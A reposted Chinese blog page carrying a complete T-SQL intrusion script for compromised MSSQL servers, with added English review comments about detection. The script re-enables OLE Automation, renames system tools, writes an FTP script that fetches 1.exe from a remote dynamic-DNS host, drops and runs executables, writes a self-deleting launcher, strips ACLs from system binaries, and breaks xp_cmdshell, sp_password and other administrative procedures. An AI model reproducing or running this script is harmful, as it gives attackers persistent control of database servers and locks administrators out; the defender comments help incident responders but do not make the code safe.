MSSQL各扩展存储过程终极解封语句

简介:
-- Batch 1: removes any existing dbo-owned definitions of sp_addextendedproc and
-- of the OLE Automation procedures (sp_OACreate, sp_OASetProperty, sp_OADestroy,
-- sp_OAMethod) so the following batches can re-register them.
-- Each DROP is guarded by a lookup in dbo.sysobjects, so a missing object is skipped.
-- NOTE(review): for defenders, DROP PROCEDURE against these system objects is not
-- part of normal administration; an audit or trace hit on it should be treated
-- as a sign of tampering. Presumably requires sysadmin-level rights - confirm.
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod;
go

-- Re-creates sp_addextendedproc as a thin wrapper around DBCC ADDEXTENDEDPROC.
-- Parameters:
--   @functname  name under which the extended procedure is registered
--   @dllname    DLL name passed to DBCC ADDEXTENDEDPROC
-- Behaviour visible here: turns implicit transactions off; if called inside an
-- open transaction (@@trancount > 0) it raises error 15002 and returns 1;
-- otherwise it registers the procedure and returns 0.
-- No validation of @dllname is performed in this body.
-- NOTE(review): registering an extended procedure loads a DLL into the SQL Server
-- process, so the ability to call this wrapper is equivalent to code execution as
-- the service account; creation of this object outside a patching window is a
-- strong compromise indicator.
create procedure sp_addextendedproc @functname nvarchar(517),@dllname varchar(255) as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0);
go

-- Re-registers the four OLE Automation procedures (sp_OACreate, sp_OASetProperty,
-- sp_OADestroy, sp_OAMethod) against odsole70.dll, each only when no dbo object
-- of that name is present in dbo.sysobjects. All four statements share one line.
-- NOTE(review): this re-enables a capability an administrator may have removed
-- as hardening. On SQL Server 2005 and later the equivalent control is the
-- 'Ole Automation Procedures' server option; keep it disabled and alert on any
-- change to it.
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
go

-- Creates four Scripting.FileSystemObject instances through sp_OACreate and calls
-- CopyFile on each. Every call writes to the same destination,
-- c:\windows\system32\ws.exe; the sources are ma.exe, cs.exe, cacls.exe and ps.exe
-- in the same directory.
-- Return codes of the sp_OA* calls are not captured, so a failed copy goes
-- unnoticed, and none of the objects is released with sp_OADestroy.
-- Later batches call ws.exe with cacls-style switches (/e /t /g, /e /d), so
-- ws.exe is presumably intended to be a renamed copy of cacls.exe - confirm.
-- NOTE(review): the local variables carry the prefix "sp_password". SQL Server's
-- trace facility replaces the text of events that contain that string with a
-- placeholder comment, which is presumably why the prefix is used - confirm.
-- For detection, that placeholder appearing in a trace, and an unexpected
-- ws.exe in system32, are both useful signals.
declare @sp_passwordo int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo out;exec sp_oamethod @sp_passwordo, 'copyfile',null,'c:\windows\system32\ma.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordod int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordod out;exec sp_oamethod @sp_passwordod, 'copyfile',null,'c:\windows\system32\cs.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordos int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordos out;exec sp_oamethod @sp_passwordos, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordode int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordode out;exec sp_oamethod @sp_passwordode, 'copyfile',null,'c:\windows\system32\ps.exe' ,'c:\windows\system32\ws.exe';
go

-- Uses Scripting.FileSystemObject to create the text file
-- c:\windows\system32\1025\run.ini (third argument 1) and writes one line to it:
-- the HKLM ...\CurrentVersion\run registry key followed by the bracketed list
-- "[2 8 18]". A later batch passes this file to regini.
-- @t is declared but never used; only the writeline call captures a return code
-- (@ret), and that value is not checked afterwards.
-- NOTE(review): the bracketed numbers look like a regini permission list, so the
-- file presumably changes the ACL on the Run key - confirm against regini's
-- documentation. For defenders, an unexpected .ini under system32\1025 and an ACL
-- change on the Run key are artefacts to collect.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\windows\system32\1025\run.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run [2 8 18]';
go


-- Three more FileSystemObject CopyFile calls under c:\windows\system32:
--   ftp.exe            -> p.exe
--   dllcache\ftp.exe   -> p.exe
--   dllcache\cacls.exe -> ws.exe
-- The dllcache sources act as a second attempt with the same destinations.
-- Return codes are not captured and the OLE objects are not destroyed.
-- NOTE(review): renamed copies of system binaries (p.exe, ws.exe) sidestep rules
-- keyed on the original file name; detection should match on file hash or the
-- original-filename version resource rather than on the image name.
declare @sp_passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo2 out;exec sp_oamethod @sp_passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';declare @sp_passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo4 out;exec sp_oamethod @sp_passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';declare @sp_passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo3 out;exec sp_oamethod @sp_passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\ws.exe';
go

-- Same copy steps as the c:\windows batches, repeated for hosts whose system
-- directory is c:\winnt. First batch: ma.exe, bsnr.exe, cacls.exe and ps.exe are
-- each copied to c:\winnt\system32\ws.exe.
-- Return codes are not captured, so on a host without c:\winnt every call here
-- fails without any visible error.
declare @sp_passwordox int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordox out;exec sp_oamethod @sp_passwordox, 'copyfile',null,'c:\winnt\system32\ma.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordodx int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordodx out;exec sp_oamethod @sp_passwordodx, 'copyfile',null,'c:\winnt\system32\bsnr.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordosx int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordosx out;exec sp_oamethod @sp_passwordosx, 'copyfile',null,'c:\winnt\system32\cacls.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordodex int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordodex out;exec sp_oamethod @sp_passwordodex, 'copyfile',null,'c:\winnt\system32\ps.exe' ,'c:\winnt\system32\ws.exe';
go

-- Second c:\winnt batch: ftp.exe and dllcache\ftp.exe -> p.exe,
-- dllcache\cacls.exe -> ws.exe.
declare @sp_passwordo2x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo2x out;exec sp_oamethod @sp_passwordo2x, 'copyfile',null,'c:\winnt\system32\ftp.exe' ,'c:\winnt\system32\p.exe';declare @sp_passwordo4x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo4x out;exec sp_oamethod @sp_passwordo4x, 'copyfile',null,'c:\winnt\system32\dllcache\ftp.exe' ,'c:\winnt\system32\p.exe';declare @sp_passwordo3x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo3x out;exec sp_oamethod @sp_passwordo3x, 'copyfile',null,'c:\winnt\system32\dllcache\cacls.exe' ,'c:\winnt\system32\ws.exe';
go

-- Creates four WScript.Shell objects and uses two of them (@sp_passwordftpcov and
-- @sp_passwordcmdcov1) to Run ws.exe with the switches "/e /t /g system:F" against
-- cmd.exe, net1.exe, p.exe (all under %SystemRoot%\system32) and
-- C:\Progra~1\Common~1\System\ado\msado15.dll.
-- @sp_passwordcmdcov and @sp_passwordcmdcov2 are created but never used.
-- If ws.exe is a copy of cacls.exe, as the switches suggest, each call edits the
-- file's ACL to grant SYSTEM full control - TODO confirm.
-- NOTE(review): commands started through WScript.Shell from sp_OAMethod typically
-- show up as child processes of the SQL Server service; a database engine
-- spawning ACL tools or cmd.exe is a high-fidelity detection.
declare @sp_passwordcmdcov INT;declare @sp_passwordcmdcov1 INT;declare @sp_passwordcmdcov2 INT;declare @sp_passwordftpcov INT;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov output;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov2 output;exec sp_OACreate 'wscript.shell',@sp_passwordftpcov output;exec sp_OAMethod @sp_passwordftpcov,'run',null,'ws.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordcmdcov1,'run',null,'ws.exe %SystemRoot%\system32\net1.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordcmdcov1,'run',null,'ws.exe %SystemRoot%\system32\p.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordftpcov,'run',null,'ws.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';

go

-- Writes a five-line text file named sb.dat (relative path, so it lands in the
-- working directory of the SQL Server process). The lines are an FTP command
-- script: open a host, two lines of "123" (presumably user name and password),
-- "get 1.exe 1.exe", then "bye". The host name is masked as XXXX on this page.
-- @t is declared but unused; @ret is assigned on each writeline but never checked.
declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'sb.dat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open XXXX.3322.org'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'get 1.exe 1.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye';
go

-- Runs "p -s:sb.dat" through WScript.Shell. p.exe is the copy of ftp.exe made by
-- an earlier batch, and -s: is ftp's script-file switch, so this step presumably
-- downloads 1.exe from the remote host - confirm.
-- NOTE(review): outbound FTP from a database server, a command file created next
-- to the SQL Server binaries, and a newly written executable in that directory
-- are the network and host indicators to hunt for. Egress filtering on the
-- database tier blocks this stage outright.
DECLARE @cmdpassword1p INT EXEC SP_OAcreate 'wscript.shell',@cmdpassword1p OUTPUT EXEC SP_OAMETHOD @cmdpassword1p,'run',null,'p -s:sb.dat';
go

-- Writes a batch file named gouri.bat (relative path) with five lines:
-- a ping of 127.0.0.1, the bare command "1", a 25-count ping of 127.0.0.1,
-- "1" again, and "del %0".
-- The pings serve as delays; "1" presumably resolves to the 1.exe fetched by the
-- FTP script - confirm; "del %0" makes the batch file delete itself after running.
-- @t is declared but unused; @retw is assigned but never checked.
-- NOTE(review): because the launcher removes itself, forensic recovery depends on
-- process-creation logging (command lines) rather than on finding the file.
declare @ow int, @fw int, @t int, @retw int
exec sp_oacreate 'scripting.filesystemobject', @ow out
exec sp_oamethod @ow, 'createtextfile', @fw out, 'gouri.bat', 1
exec @retw = sp_oamethod @fw, 'writeline', NULL,'ping 127.0.0.1'
exec @retw = sp_oamethod @fw, 'writeline', NULL,'1'
exec @retw = sp_oamethod @fw, 'writeline', NULL,'ping 127.0.0.1 -n 25'
exec @retw = sp_oamethod @fw, 'writeline', NULL,'1'
exec @retw = sp_oamethod @fw, 'writeline', NULL,'del %0';
go




-- Runs the Windows "convert" utility through cmd /c with an NTFS argument for
-- drive c. Presumably this is there because the ACL changes made elsewhere in
-- the script only apply on NTFS volumes - confirm.
declare @sp_passworddboysb16 int exec sp_oacreate 'wscript.shell',@sp_passworddboysb16 output exec sp_oamethod @sp_passworddboysb16,'run',null,'cmd /c convert c:/fs:ntfs';
go

-- Feeds %SystemRoot%\system32\1025\run.ini (written by an earlier batch) to
-- regini, applying whatever that file specifies for the HKLM Run key.
-- NOTE(review): regini.exe launched by the SQL Server service account is unusual
-- enough to alert on by itself.
declare @sp_passworddboysb160 int exec sp_oacreate 'wscript.shell',@sp_passworddboysb160 output exec sp_oamethod @sp_passworddboysb160,'run',null,'cmd /c %SystemRoot%\system32\regini %SystemRoot%\system32\1025\run.ini';
go


-- Runs one cmd /c command line that deletes a list of files by relative name
-- (ps.exe, xc.exe, ma.exe, n.exe, fpt.exe, http.vbs, http1.vbs, tstp.exe and one
-- non-ASCII name), deletes c:\windows\system\1.vbs, and appends a line of text
-- to naicha.txt in the working directory.
-- NOTE(review): the deleted names look like tooling left by earlier intrusions,
-- so this is presumably clean-up of competing or previous payloads - confirm.
-- The marker file naicha.txt is a stable host indicator for this script.
declare @sp_passworddboysb INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb output;exec sp_OAMethod @sp_passworddboysb,'run',null,'cmd /c del ps.exe&del xc.exe&del ma.exe&del n.exe&del fpt.exe&del http.vbs&del http1.vbs&del tstp.exe&del SOPO抓1433&del c:\windows\system\1.vbs&echo 在SOPO的双手之下,1433一切都是浮云>>naicha.txt';
go

-- Uses an ADODB.Stream object to write binary data to disk: sets Type to 1,
-- opens the stream, writes a hex literal, saves it as mss.exe (relative path)
-- with save option 2, then closes and destroys the object.
-- The hex literal is cut off on this page ("0x16" followed by non-hex text), so
-- the statement is not valid T-SQL as shown and the embedded payload is absent.
-- This is the only batch in the script that calls sp_OADestroy.
-- NOTE(review): writing an executable from a binary literal needs no network
-- access, so egress filtering alone does not stop this stage; large hex literals
-- in SQL text and new .exe files created by the database service are the signals.
DECLARE @ObjectToken INT;EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT;EXEC sp_OASetProperty @ObjectToken, 'Type', 1;EXEC sp_OAMethod @ObjectToken, 'Open';EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x16禁止;EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'mss.exe', 2;EXEC sp_OAMethod @ObjectToken, 'Close';EXEC sp_OADestroy @ObjectToken;
go

-- Starts gouri.bat (written by an earlier batch) through WScript.Shell Run.
-- No wait flag is passed and the return code is not captured, so the script
-- continues without knowing whether the batch file ran.
declare @sp_passworddboysb1go INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb1go output;exec sp_OAMethod @sp_passworddboysb1go,'run',null,'gouri.bat';
go

-- Nineteen near-identical batches. Each creates a WScript.Shell object and runs
-- ws.exe against one file with "/e /d everyone" or "/e /d system".
-- If ws.exe is a copy of cacls.exe, as the switches suggest, each call edits the
-- file's ACL to deny access to that principal - TODO confirm.
-- Targets, under %SystemRoot%\system32 and its dllcache subdirectory: wscript.exe,
-- ftp.exe, cscript.exe, cacls.exe, cmd.exe, sethc.exe, net1.exe, utilman.exe,
-- p.exe, icacls.exe; plus C:\Progra~1\Common~1\System\ado\msado15.dll.
-- The variable @sp_passworddboysb14 is declared in two batches; that is legal
-- because each "go" starts a new scope.
-- NOTE(review): denying SYSTEM and Everyone on these binaries presumably keeps
-- other intruders - and the administrator - from using them afterwards. For
-- responders this means standard tooling on the host may fail with access-denied
-- errors; explicit deny entries on these files are themselves an indicator, and
-- ACLs should be restored from a known-good baseline rather than edited by hand.
declare @sp_passworddboysb1 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb1 output;exec sp_OAMethod @sp_passworddboysb1,'run',null,'ws.exe %SystemRoot%\system32\wscript.exe /e /d everyone';
go

declare @sp_passworddboysb2 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb2 output;exec sp_OAMethod @sp_passworddboysb2,'run',null,'ws.exe %SystemRoot%\system32\ftp.exe /e /d everyone';
go

declare @sp_passworddboysb3 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb3 output;exec sp_OAMethod @sp_passworddboysb3,'run',null,'ws.exe %SystemRoot%\system32\cscript.exe /e /d everyone';
go

declare @sp_passworddboysb4 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb4 output;exec sp_OAMethod @sp_passworddboysb4,'run',null,'ws.exe %SystemRoot%\system32\cacls.exe /e /d system';
go

declare @sp_passworddboysb5 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb5 output;exec sp_OAMethod @sp_passworddboysb5,'run',null,'ws.exe %SystemRoot%\system32\cmd.exe /e /d system';
go

declare @sp_passworddboysb6 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb6 output;exec sp_OAMethod @sp_passworddboysb6,'run',null,'ws.exe %SystemRoot%\system32\sethc.exe /e /d system';
go

declare @sp_passworddboysb7 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb7 output;exec sp_OAMethod @sp_passworddboysb7,'run',null,'ws.exe %SystemRoot%\system32\net1.exe /e /d system';
go

declare @sp_passworddboysb8 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb8 output;exec sp_OAMethod @sp_passworddboysb8,'run',null,'ws.exe %SystemRoot%\system32\dllcache\wscript.exe /e /d everyone';
go

declare @sp_passworddboysb9 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb9 output;exec sp_OAMethod @sp_passworddboysb9,'run',null,'ws.exe %SystemRoot%\system32\dllcache\ftp.exe /e /d system';
go

declare @sp_passworddboysb10 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb10 output;exec sp_OAMethod @sp_passworddboysb10,'run',null,'ws.exe %SystemRoot%\system32\dllcache\cscript.exe /e /d everyone';
go

declare @sp_passworddboysb11 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb11 output;exec sp_OAMethod @sp_passworddboysb11,'run',null,'ws.exe %SystemRoot%\system32\dllcache\cacls.exe /e /d system';
go

declare @sp_passworddboysb12 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb12 output;exec sp_OAMethod @sp_passworddboysb12,'run',null,'ws.exe %SystemRoot%\system32\dllcache\cmd.exe /e /d system';
go

declare @sp_passworddboysb13 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb13 output;exec sp_OAMethod @sp_passworddboysb13,'run',null,'ws.exe %SystemRoot%\system32\dllcache\sethc.exe /e /d system';
go

declare @sp_passworddboysb14 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb14 output;exec sp_OAMethod @sp_passworddboysb14,'run',null,'ws.exe %SystemRoot%\system32\utilman.exe /e /d system';
go

declare @sp_passworddboysb14 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb14 output;exec sp_OAMethod @sp_passworddboysb14,'run',null,'ws.exe %SystemRoot%\system32\dllcache\net1.exe /e /d system';
go

declare @sp_passworddboysb15 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb15 output;exec sp_OAMethod @sp_passworddboysb15,'run',null,'ws.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /d system';
go

declare @sp_passworddboysb17 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb17 output;exec sp_OAMethod @sp_passworddboysb17,'run',null,'ws.exe %SystemRoot%\system32\p.exe /e /d system';
go

declare @sp_passworddboysb19 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb19 output;exec sp_OAMethod @sp_passworddboysb19,'run',null,'ws.exe %SystemRoot%\system32\icacls.exe /e /d system';
go

declare @sp_passworddboysb20 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb20 output;exec sp_OAMethod @sp_passworddboysb20,'run',null,'ws.exe %SystemRoot%\system32\dllcache\icacls.exe /e /d system';
go

-- Five batches that each start an executable by relative name through
-- WScript.Shell Run: mss.exe, rar.exe, uu.exe, qq2.exe, qq3.exe.
-- Only mss.exe is written by this script (the ADODB.Stream batch); the others are
-- not created anywhere in the visible text, so they are presumably expected to
-- exist already or the calls fail unnoticed - return codes are not captured.
-- These variables are spelled "passwored...", so they do not contain the string
-- "sp_password" that the earlier variable names carry.
-- NOTE(review): treat any of these file names in the SQL Server working directory,
-- or as child processes of the database service, as indicators of compromise.
declare @passworedboysb21 int exec sp_oacreate 'wscript.shell',@passworedboysb21 output exec sp_oamethod @passworedboysb21,'run',null,'mss.exe';
go

declare @passworedboysb22 int exec sp_oacreate 'wscript.shell',@passworedboysb22 output exec sp_oamethod @passworedboysb22,'run',null,'rar.exe';
go

declare @passworedboysb23 int exec sp_oacreate 'wscript.shell',@passworedboysb23 output exec sp_oamethod @passworedboysb23,'run',null,'uu.exe';
go

declare @passworedboysb24 int exec sp_oacreate 'wscript.shell',@passworedboysb24 output exec sp_oamethod @passworedboysb24,'run',null,'qq2.exe';
go

declare @passworedboysb25 int exec sp_oacreate 'wscript.shell',@passworedboysb25 output exec sp_oamethod @passworedboysb25,'run',null,'qq3.exe';
go

-- Final batch: drops xp_cmdshell, sp_password, xp_dirtree, xp_regwrite,
-- sp_OACreate (twice), sp_oamethod, sp_OASetProperty and sp_OADestroy, and after
-- each drop re-registers the same name with DBCC ADDEXTENDEDPROC using a free-text
-- string in place of a DLL name. It ends by dropping sp_dropextendedproc.
-- Since those strings are not DLL names, later calls to these procedures
-- presumably fail - confirm. The DROPs are unguarded, so a missing object raises
-- an error here, unlike the first batch.
-- NOTE(review): the net effect is that the server's own administrative procedures
-- (including password change) are left broken and the procedure normally used to
-- unregister them is gone. Extended procedures registered against a non-DLL
-- string are a distinctive marker of this script. Recovery should assume the host
-- is compromised: rebuild from trusted media or restore the system procedures
-- from a known-good source, rotate all SQL logins, and do not trust binaries
-- found on the machine.
DROP PROCEDURE xp_cmdshell;dbcc addextendedproc ('xp_cmdshell','SOPO1433.QQ:994216773')DROP PROCEDURE sp_password;dbcc addextendedproc ('sp_password','Microsoft提示您请误随便操作SQL管理密码 以免对起数据库造成不必要的麻烦')DROP PROCEDURE xp_dirtree;dbcc addextendedproc ('xp_dirtree','Microsoft提示您请误随意操作SQL数据库 以免对起数据库造成不必要的麻烦')DROP PROCEDURE xp_regwrite;dbcc addextendedproc ('xp_regwrite','1')DROP PROCEDURE sp_OACreate;dbcc addextendedproc ('sp_OACreate','SOPO1433.QQ;545770193')DROP PROCEDURE sp_OACreate;dbcc addextendedproc ('sp_OACreate','SOPO1433.QQ:994216773')DROP PROCEDURE sp_oamethod;dbcc addextendedproc ('sp_oamethod','SOPO1433.QQ:994216773')DROP PROCEDURE sp_OASetProperty;dbcc addextendedproc ('sp_OASetProperty','SOPO1433.QQ:994216773')DROP PROCEDURE sp_OADestroy;dbcc addextendedproc ('sp_OADestroy','SOPO1433.QQ:994216773')drop procedure sp_dropextendedproc;

go

















本文转自 hackfreer 的 51CTO 博客,原文链接:http://blog.51cto.com/pnig0s1992/447546,如需转载请自行联系原作者
